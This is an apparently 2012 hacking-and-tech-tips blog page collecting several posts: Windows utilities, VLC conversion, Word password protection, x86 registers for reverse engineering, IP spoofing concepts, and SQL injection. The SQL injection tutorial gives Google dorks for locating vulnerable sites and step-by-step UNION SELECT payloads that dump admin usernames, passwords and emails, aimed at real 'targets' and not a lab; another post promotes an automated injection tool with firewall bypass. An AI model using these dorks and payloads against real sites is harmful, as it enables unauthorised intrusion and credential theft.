Tuesday, January 31, 2012

Give your Windows a 3D Look



Hii Friends...I hope you all are fine. I hope my previous posts were beneficial for you. Well, today am back with an Amazing software named as T3Desk. It is a very Interesting software which helps you to give a 3D look to your blog. It gives a third dimension look to your Windows. It lets you give a Transparent look to your Windows. Well, it is a lightweight software. It is an unique application.

Read More...




Using this software, your windows can be zoomed , Flipped , moved in almost anyway you want. You can surf more easily using T3Desk. You can also configure your windows Dimension looks, Transparency Effect and much more. This software will work on almost all versions of Windows.

                                                 
Download

So, download this RAR file and give your Windows a 3D look.




Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

Uninstall any program within a single click


Menu uninstaller


Hii Friends.....I hope you all are fine. Today am back with a Trick which is quite amazing trick that  help us to uninstall any program or an application within a single click. Well, Always we uninstall all the programs and applications by going to control panel 

Well, This is not a trick but a very amazing software that helps us to save our time.  This software helps us to install any program from its  shortcut. This software is termed as Menu uninstaller.This software works in all Windows OS like XP, Vista and Windows 7.

How this Software Works???????
1) Download Menu uninstaller and install it to your PC.
(2) After installing the software, Now Click on any software or application's Shortcut that you want to uninstall. When you right click on it click on  uninstall. Just take a look at the 
screenshot:-




                                              
 
Enjoy!!!!




Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

How to convert Videos using VLC Media Player

Hii Friends....I hope you all are fine!! As most of us know VLC Player is an awesome media player that supports almost all Video Codecs. But most of the people are unaware about it's amazing feature that this amazing utility can also convert videos.  So, it is a multi-purpose media player. This will convert videos easily in your desired format. If you do not have this amazing utility, Download it from here.



Read More....




Steps to Convert Videos using VLC Media Player:


  • Open VLC Media Player.
  • Now select Media Option.
  • Select Convert/Save option from the drop down menu.


  • Now a new pop-up window will occur. Click on Add button located under the files to select the that you want to convert.





  • You can also add subtitles which will be hardcoded to the converted file.To add subtitles check the Use a subtitle option.(Optional)
  • Now Click on Convert/Save button. You will see another window.
  • Select the Destination File and ProfileConversion Format ).


  • Click on start button to begin conversion.
  • And now the video Conversion will start and you will see something like streaming!!
      •  
Now you have learnt to Convert videos using VLC Media Player!!

Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

Trick to Password Protect Microsoft Word 2007 Files


Hii Friends...I hope you all are fine. Mainly we prefer Microsoft Word to create documents!! But Sometimes we have some documents saved in our computer that we want avoid from other people to access them. Such as Office reports or college projects,notes,etc. However, Microsoft word 2007 has a useful security feature to password protect our private documents. So today am going to share a very useful trick "Trick to password protect Microsoft Word 2007 files"!!


Read More...


Steps to Password Protect Microsoft Word 2007 files:


  • Open any document that you want to password protect.
  • Click on the Microsoft Office button present at the top left corner of the window.
  • Click on Save as option.


  • Now a new window will appear. Click on Tools option at the bottom of the window and select General Options.



  • Now again a new window will appear saying General Options. You will see the top two options-Password to open and Password to Modify. You can select either one or both options.

  • The first is Password to open -It will ask this password every time when someone tries to open  the document. If one tries to view the document, he needs to enter this password.
    The second is Password to modify- It will ask this password every time when someone tries to modify the document that is tries make any changes in your document. If one tries to make changes in the document, he needs to enter this password to save the changes. 




  • Give your document a password of your wish and click on OK button.
  • That's all!!!


Now your Word document is protected from unwanted eyes!!!

Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

Automated SQL injection with pangolin- Tutorial+Application download



Pangolin is an automatic SQL injection penetration testing (Pen-testing) tool for Website manager or IT Security analyst. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or users specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.





Test many types of databases


Your web applications using Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase.

Pangolin supports all of them.

Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall setting, Injection Digger, Data dumper, etc.

DOWNLOAD PANGOLIN 3.2!!

DOWNLOAD TUTORIAL



Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

SpeedyFox: Firefox Speed Booster



SpeedyFox: Firefox Speed Booster
Hey friends....I hope you all are fine. Are you are pissed off with the slow Firefox speed??? Then Today am going to provide you a very useful tool for you that is SpeedyFox, which will help you to get rid of slow Firefox Speed. SpeedyFox is a small utility which compresses all your saved data and thereby, enhances your Firefox speed to a great way.  It compresses all the data that makes Firefox heavier and eats up its speed. It will compress it and will make it faster and smoother.


Features of Speedyfox:-





  • It will boost your startup time by 3 times.

  • Boost your browsing speed.

  • Quick Operation with Cookies.


      SPEEDYFOX FREE DOWNLOAD FOR WINDOWS

  • After Downloading SpeedyFox, Just run it.
  • Check mark on Run Firefox After Optimization.After that, Click on Speed up my Firefox. {Make sure that Firefox is closed}
SpeedyFox: Firefox Speed Booster

  • When it will be optimized, the Firefox window will open and you will see a Sudden increase in your Browsing Speed!!Enjoy!!!!!!

Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

The basics of Computer Architecture for Reverse Engineering




Hello friends. I have been busy these days with some Metasploit stuff so I was not able to bring my continuation material for Reverse Engineering and Assembly. IN my previous post I provided a quick material for learning the basics of Assembly language. The pdf is a useful handbook and will help you for quick reference. Now I will continue the tutorial to next step. In the previous tutorial- Fast draft Assembly , I focused on Assembly basics. Here I wil throw some light on some more concepts which I found useful during my coarse of learning reverse engineering.



So in case you have missed my previous tutorial then please go back, download the pdf and read it once. It will give you a quick idea about assembly. Dont worry if you dont understand it completely. Assembly is too big to learn so if you want to dig deeper then you can refer a good book. Here I will cover those things that you will be requiring for learning reverse engineering.

So lets start with the second part.

Some basics about Computer Architecture

What the 'F' about x86 and x64 ?


Interesting question - x86 is a very old technology that started with the 8086 family of processors. It has now evolved into the x86-32 version which is the most common version and its successor the x86-64 or more commonly known as x64.

the architecture was called x86 to show that they all ended in the number 86, even though it's 32-bit (definitely not 86 bit!). x64 is a contraction of x86-64.  for example, Core 2 Duo processors actually use a 64-bit version of the older x86 architecture (and they are backwards compatible - notice how Windows 64-bit can run 32-bit programs without any problem? The processors support this natively!). x64 is just where people are too lazy to write x86-64.


The fuzz about 32 bit and 64 bit


You must have heard your friends or colleagues shouting about this. "mine is 64 bit , yours is 32 bit" . But what exactly means. Again a good question(by me) . Lets solve the puzzle  today.
The register is a small amount of storage used by the CPU where the CPU keeps the data it needs to access the quickest in order for optimum computer performance. The bit designation refers to the width of the register, thus a 64-bit register can hold more data than a 32-bit register which in turn holds more than 16-bit and 8-bit registers. The more ample the space in the CPU’s register system the more it can handle, especially in terms of utilizing system memory.
The major difference lies in utilizing the system memory. A CPU with  32 bit register can have a ceiling of 2^32 (2 raised to the power of 32) addresses within the register. Hence it cannot support more than 4 GB of system memory or RAM. Whereas in the case of 64 bit register, it can have 2^64 addresses within the register.
Hope you got answers to some questions you might have never thought about but used them frequently.



Understanding the CPU Registers

Assembly language is a low level or simply called machine language made up of machineinstructions. Assembly language is specific to processor architecture example different for x86 architecture than for SPARC architecture. Assembly language consist of assembly instructions andCPU registers.

Registers are small segments of memory inside CPU that are used for storing temporary data. Some registers have specific functions, others are just use for some general data storage. I am considering that you all are using x86 machines. There are two types of processors32 bit and 64 bit processors. In a 32 bit processor, each register can hold 32 bits of data. On the other hand 64 bit register can hold 64 bit data. We will mostly focus on 32 bit machines in our tutorial.
Registers play a key role in reverse engineering process so an overview of registers is necessary. We will look at some general purpose registers which are mostly used in reverse engineering.

EAX - This is the accumulator register which is used to store the results of calculations. The word E stands for "extended". I will explain you another concept related to it later on in the tutorial.


EDX - The data register is the an extension to the accumulator. It is most useful for storing data related to the accumulator's current calculation.

ECX - The count register is the universal loop counter. It functions similar to a variable that we use to set up our loop counter value.

EDI - EDI points to the location where the result of data operation is stored, or the destination index. Every loop must store its result somewhere, and the destination index points to that place. With a single-byte STOS instruction to write data out of the accumulator, this register makes data operations much more size-efficient.

ESI - In loops that process data, the source index holds the location of the input data stream. Like the destination index, EDI had a convenient one-byte instruction for loading data out of memory into the accumulator. ESI register is the source index for data operation and holds the location of the input data stream.

ESP - ESP is the sacred stack pointer. With the important PUSH, POP, CALL, and RET instructions requiring it's value, there is never a good reason to use the stack pointer for anything else.

EBP - In functions that store parameters or variables on the stack, the base pointer holds the location of the current stack frame. In other situations, however, EBP is a free data-storage register.

EBX - In 16-bit mode, the base register was useful as a pointer. Now it is completely free for extra storage space.EBX is the only register that was not designed for anything specific. It can be used for extra storage.

The 'E' at the beginning of each register name stands for Extended. When a register is referred to by its extended name, it indicates that all 32 bits of the register are being addressed.  An interesting thing about registers is that they can be broken down into smaller subsets of themselves; the first sixteen bits of each register can be referenced by simply removing the 'E' from the name. For example, if you wanted to only manipulate the first sixteen bits of the EAX register, you would refer to it as the AX register. Additionally, registers AX through DX can be further broken down into two eight bit parts. So, if you wanted to manipulate only the first eight bits (bits 0-7) of the AX register, you would refer to the register as AL; if you wanted to manipulate the last eight bits (bits 8-15) of the AX register, you would refer to the register as AH ('L' standing for Low and 'H' standing for High).

Understanding Memory and Stacks



There are three main sections of memory:


1. Stack Section - Where the stack is located, stores local variables and function arguments.


2. Data Section - Where the heap is located, stores static and dynamic variables.


3. Code Section - Where the actual program instructions are located.


The stack section starts at the high memory addresses and grows downwards, towards the lower memory addresses; conversely, the data section (heap) starts at the lower memory addresses and grows upwards, towards the high memory addresses. Therefore, the stack and the heap grow towards each other as more variables are placed in each of those sections.





High Memory Addresses (0xFFFFFFFF)
---------------------- <-----Bottom of the stack
|                          |
|                          |   |
|         Stack        |   | Stack grows down
|                          |   v
|                          |
|---------------------| <----Top of the stack (ESP points here)
|                          |
|                          |
|                          |
|                          |
|                          |
|---------------------|  <----Top of the heap
|                          |
|                          |    ^
|       Heap          |     |   Heap grows up
|                          |    |
|                          |
|---------------------| <-----Bottom of the heap
|                          |
|    Instructions    |
|                          |
|                          |
-----------------------
Low Memory Addresses (0x00000000)





So now let us relate these concepts with Assembly now. We will now analyse how we can actually use these concepts in generating machine code. 
Let us go back to our previous post in which we studied some concepts about Assembly language. Assembly language is based on machine instructions so proper knowledge of Computer architecture is very essential to understand the overall operation.
So let us now relate what we studied in our previous post and in this one. Let us see some important assebly instructions.


Some Important Assembly instructions





Instruction
Example
         Description
push    
push eax
Pushes the value stored in EAX onto the stack
pop
pop eax
Pops a value off of the stack and stores it in EAX
call
call 0x08abcdef
Calls a function located at 0x08abcdef
mov
mov eax,0x5
Moves the value of 5 into the EAX register
sub
sub eax,0x4
Subtracts 4 from the value in the EAX register
add
add eax,0x1
Adds 1 to the value in the EAX register
inc
inc eax
Increases the value stored in EAX by one
dec
dec eax
Decreases the value stored in EAX by one
cmp
cmp eax,edx
Compare values in EAX and EDX; if equal set the zero flag* to 1
test
test eax,edx
Performs an AND operation on the values in EAX and EDX; if the result is zero, sets the zero flag to 1
jmp
jmp 0x08abcde
Jump to the instruction located at 0x08abcde
jnz
jnz 0x08ffff01
Jump if the zero flag is set to 1
jne
jne 0x08ffff01
Jump to 0x08ffff01 if a comparison is not equal
and
and eax,ebx
Performs a bit wise AND operation on the values stored in EAX and EBX; the result is saved in EAX
or
or eax,ebx
Performs a bit wise OR operation on the values stored in EAX and EBX; the result is saved in EAX
xor
xor eax,eax
Performs a bit wise XOR operation on the values stored in EAX and EBX; the result is saved in EAX
leave
leave
Remove data from the stack before returning
ret
ret
Return to a parent function
nop
nop
No operation (a 'do nothing' instruction)

If you have understood the things we have learned so far then you are half way through. Rest involves how much you can explore yourself. All you need is a debugger. I prefer using Olly dbg but you can choose any debugger you are comfortable with. Try to open any exe file in the debugger and analyse the codes. You will find several things which you have learned here and help you understand things in detail. In my next po9st I will show you how we can Reverse engineer different software's using the knowledge we have learned so far. 

Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

Basic SQL injection tutorial - Readers Choice



Hello readers. This has been a very busy week for me. But i had to take out time for my blog. First of all I would like to thank you all for visiting my blog frequently and post your feedbacks and requests. In the past one month Hackerszone has seen an enormous growth in traffic. today I am writing on SQL injection. this is my third tutorial on SQL injection but there is a heavy demad for it again and again. I have kept it a bit higher than basic level as you can go around and find lots of material for basics. Here I have compiled the major techniques in a single tutorial. So lets start.


What is SQL Injection?

SQL Injection (Or SQLi for short) is a method of code injection into Structured Query Language (SQL) databases. It exploits a security issue where a user's input is not correctly filtered, usually due to poorly coded query language interpreters.
Consider this code:
Code:
statement = "SELECT * FROM `members` WHERE `user` = '" + user + "';"

The above statement selects the specified "user" from the "members" table. Do you see any problems with this? Consider the following input as a username:
Code:
' or 'x' = 'x

When the database tries to pull up records of that username, this is the resulting query:
Code:
SELECT * FROM `members` WHERE `user` = '' OR 'x'='x';

Now, as you can see, the username is actually completely blank contained within the '', but the following OR statement will return true, as 'x' always = 'x'. Due to this problem of incorrectly filtering database queries, the hacker can input his/her own malicious code.

The above was just one example of SQL Injection, what we will be learning in this tutorial, is integer based SQL Injection using the ORDER BY and UNION SELECT queries.

Googe Dorks?

Before we get started on the rest of the tutorial, you will need to know what a Google dork is, and no, it's not the kind of dork you are thinking of!
A google dork is a small search phrase done by the hacker to find sites vulnerable to SQL Injection. Usually this search term will be very small and it will look for specific lines of text within the webpage or in the URL. I've included some here as a start:
Code:
inurl:trainers.php?id=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:Pageid=
inurl:games.php?id=
inurl:newsDetail.php?id=
inurl:staff_id=
inurl:news_view.php?id=
inurl:humor.php?id=
inurl:pages.php?id=
inurl:view.php?id=
inurl:detail.php?ID=
inurl:publications.php?id=
inurl:Productinfo.php?id=
inurl:releases.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:section.php?id=
inurl:page.php?id=
inurl:newsid=
inurl:news_display.php?getid=


Is my site vulnerable?

Now after you have found a site using a Google dork you need to check if it is vulnerable to integer based SQL Injection. To do this, it's simple. All you need to do is add an apostrophe ( ' )to end of the URL. You should get an error similar to this back:
Code:
Error executing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY date_added DESC' at line 1

If you get this error, it usually means your site is vulnerable!

ORDER BY x--

Our first step to accessing the database, will to be find how many columns there are in the site. To do this, we use the ORDER BY x-- query (x being an integer variable). Example:
Code:
www.examplesite.com/index.php?id=5 ORDER BY 1--

We want to keep increasing "x" until we get back an error. So why? Imagine our database has 4 columns, if we try to order by the 5th, it can't access it. It doesn't exist. So if we get an error on ORDER BY 5--, it means we have 4 columns. Here is an example:
Code:
www.examplesite.com/index.php?id=5 ORDER BY 1-- (No error)
www.examplesite.com/index.php?id=5 ORDER BY 2-- (No error)
www.examplesite.com/index.php?id=5 ORDER BY 3-- (No error)
www.examplesite.com/index.php?id=5 ORDER BY 4-- (No error)
www.examplesite.com/index.php?id=5 ORDER BY 5-- (Error)

We can now determine the site has 4 columns.

UNION SELECT

We use the union select statement to combine the results of multiple querys in our SQLi. To test if it works, go to our sites normal URL, and write "UNION SELECT 1,2,3,4--" (without quotes) after it. In our example, we use "1,2,3,4--", but on other sites, you will usually have a different number of columns. Example: On a site with 5 columns it would be "union select 1,2,3,4,5--".

Code:
www.examplesite.com/index.php?id=-5 UNION SELECT 1,2,3,4--

You have probably noticed several numbers have appeared on the page. This is the vulnerable columns we are going to use for our SQLi. In our example, column 3 is vulnerable. You have also probably noticed I have replaced id=5 with id=-5. The reason for this is that sometimes our query on the page will be covered up by text or images, making it hard to find, or only viewable in the source code. To bypass this, we try to get the site to call a non-existing page (id=-5, there are no pages with the ID of -5). Usually this will result in the page being cleared of all text and images. If it doesn't work, just remove the - and continue on as normal.

VERSION()

This will be one of the easier things to do and understand, the name of the query itself is self explanatory. After we have tested UNION SELECT (and it works) we simply input VERSION() into one of the vulnerable columns in our URL, example:
Code:
http://www.examplesite.com/index.php?id=-5 union select 1,2,VERSION(),4--

We had 4 columns in our example and the vulnerable column was number 3. We have replaced the number 3 with VERSION(). You should now see the SQL version of the database. This tutorial will only deal with Integer based injection on SQL version 5 and above.

If our target has a version over 5, continue reading, if not, you need to find a new target or read a different tutorial.

Table_name

Now we are going to get into the tables. This is where all the information you are looking for will be kept, but first, we need to find the table names. To do so, replace VERSION() with group_concat(table_name). Then after your last column number, add "from information_schema.tables--". Example:
Code:
http://www.examplesite.com/index.php?id=-5 UNION SELECT 1,2,group_concat(table_name),4 from information_schema.tables--

What this code is doing, is combining the queries of column 1,2,3 and 4. In column 4, it is selecting all possible table names. These queries are then taken from information_schema.tables. You should now see a list of all table names on the screen.

Column_name

To find the column names we do the same thing, but replace tables with columns, but we include which table to get the column names from. What we want to use is a table which seems like it would include some good information, for our example, we are going to say we found the table "admin". Example:

Code:
http://www.examplesite.com/index.php?id=-5 UNION SELECT 1,2,group_concat(column_name),4 from information_schema.columns where table_name='admin'--

Here, as before, we are combining the queries of 1,2,3 and 4. In column 3 we are requesting all of the column names from information_schema.columns, but this time only from where the table_name is equal to "admin". Otherwise we would get the name of every column in the database, and this would just take much longer to go through.

Magic Quotes?

One common problem when completing the Column_Name stage is that they still recieve an error. This can be frustrating to those new to SQL Injection, so I'm going to cover the reason for this.

The problem here, is that the admin of the site has attempted to outsmart you by using "Magic Quotes". What this does, is it only allows you to select from the table if the table_name is in hex. You can convert your table name to hex by going here: http://www.swingnote.com/tools/texttohex.php

Our query will now look like this:
Code:
http://www.examplesite.com/index.php?id=-5 UNION SELECT 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x61646d696e--

You have most likely noticed that if you convert our plaintext column name into hex, the 0x isn't shown. The 0x is something we put in ourselves, which tells the site that the following text is going to be in hex.

Extracting Data

To finish off, we need to extract the data from the columns we have chosen. Once we found out the column_names, we can then use them in our group_concat() query to get exactly what we have been looking for. In our example, we will have found the column names "username", "password" and "email.
Code:
http://www.examplesite.com/index.php?id=-5 UNION SELECT 1,2,group_concat(username,0x3a,password,0x3a,email) from admin--

This query extracts the usernames, passwords and emails from the admin table. Remember I told you what 0x does? Well you will notice it again in our last query. 0x3a is the hex code for a colon ( : ). It is used so we can seperate our results easier, by doing this, we will get returned the following:

Code:
ExUser1:ExPass1:ExEmail1
ExUser2:ExPass2:ExEmail2
ExUser3:ExPass3:ExEmail3

Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

IP Spoofing - The Untracable HACK!



The term IP spoofing is a combination of two different words IP + Spoofing .

IP refers to the connectionless protocol which is responsible for the process of routing up the data packets over the network . Since it is a connectionless protocol hence there is no acknowledgement received to the sender of the message that the it has been received without any flaw at the receiver end. The term spoofing means that the attacker sends the message to a computer indicating that it has came from a trusted source . Hence IP spoofing is the concept of spoofing the identity of a trusted source(victim) and to gain access at the same privilege at which the victim is.

Brief History of IP spoofing

In the April 1989 article entitled: “Security Problems in the TCP/IP Protocol Suite” ,

author S. M Bellovin of AT & T Bell labs was among the first to identify IP spoofing as a

real risk to computer networks. Bellovin describes how Robert Morris, creator of the now

infamous Internet Worm, figured out how TCP created sequence numbers and forged a

TCP packet sequence. This TCP packet included the destination address of his “victim”

and using an IP spoofing attack Morris was able to obtain root access to his targeted

system without a User ID or password.

A common misconception is that "IP spoofing" can be used to hide your IP address while

surfing the Internet, chatting on-line, sending e-mail, and so forth. This is generally not

true. Forging the source IP address causes the responses to be misdirected, meaning you

cannot create a normal network connection. However, IP spoofing is an integral part of

many network attacks that do not need to see responses (blind spoofing).



Detailed Overview of the attack

The heart of network connectivity over the internet is based on the TCP/IP protocol which collectively describes how a connection is established and how the data will be transmitted over the network . Here I will briefly tell the aspects of IP and TCP that are exploited in order to perform the attck.

Here are the models of TCP and IP headers.




Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contains the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses – specifically the “source address” field. It's important to note that each datagram is sent independent of all others due to the stateless nature of IP. Keep this fact in mind as we examine TCP in the next section.

As you can see above, a TCP header is very different from an IP header. We are concerned with the first 12 bytes of the TCP packet, which contain port and sequencing information. Much like an IP datagram, TCP packets can be manipulated using software. The source and destination ports normally depend on the network application in use (for example, HTTP via port 80). What's important for our understanding of spoofing are the sequence and acknowledgement numbers. The data contained in these fields ensures packet delivery by determining whether or not a packet needs to be resent. The sequence number is the number of the first byte in the current packet, which is relevant to the data stream. The acknowledgement number, in turn, contains the value of the next expected sequence number in the stream. This relationship confirms, on both ends, that the proper packets were received. It’s quite different than IP, since transaction state is closely monitored.

Obviously, it's very easy to mask a source address by manipulating an IP header. This technique is used for obvious reasons and is employed in several of the attacks discussed below. Another consequence, specific to TCP, is sequence number prediction, which can lead to session hijackig or host impersonating.

IP spoofing in brief consists of several interim steps;

• Selecting a target host ( or victim).

• The trust relationships are reviewed to identify a host that has a “trust” relationship

with the target host.

• The trusted host is then disabled and the target’s TCP sequence numbers are sampled.

• The trusted host is then impersonated, the sequence numbers forged (after being

calculated) .

• A connection attempt is made to a service that only requires address-based

authentication (no user id or password).

• If a successful connection is made, the attacker executes a simple command to leave a

Backdoor.

Some Common IP spoofing Attacks

Blind spoofing

It is the most sophisticated attack in which the sequence and acknowledgement number are to be determined randomly . The attacker tries to send random packets to the victim in order to examine the pattern of sequence numbers . Modern operating systems use random sequence number generation techniques which makes it very difficult to analyze the sequence and acknowledgement numbers by sending packets.



Non- Blind spoofing

This type of spoofing attack can be performed when both the victim and the attacker are on the same subnet . Then there is a plus point for the attacker as the acknowledgement and sequence number can be sniffed , and hence the hard work of calculating and analyzing them manually is removed.



Man In the Middle Attack

This attack is well understood with its name itself . In this type of attack two trusted sources are involved in a communication when the attacker spoofs the identity of one of the trusted sources . The attacker then controls the flow of communication between the two trusted sources and can even fool the recipient to give confidential information. The attacker can also manipulate the data transfer that is taking place between the two trusted sources.



Countermeasures to IP spoofing

The countermeasures to spoofing will totally depend upon the type of attack and the network setup. Still some of the basic features that can be implemented to prevent IP spoofing attack are by providing encrypted authentication , packet filtering at the router and implementing application based authentication .

IP Spoofing is a problem without an easy solution, since it’s inherent to the design of the TCP/IP suite. Understanding how and why spoofing attacks are used, combined with a few simple prevention methods, can help protect your network from these malicious cloaking and cracking techniques.



Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Web Hosting Bluehost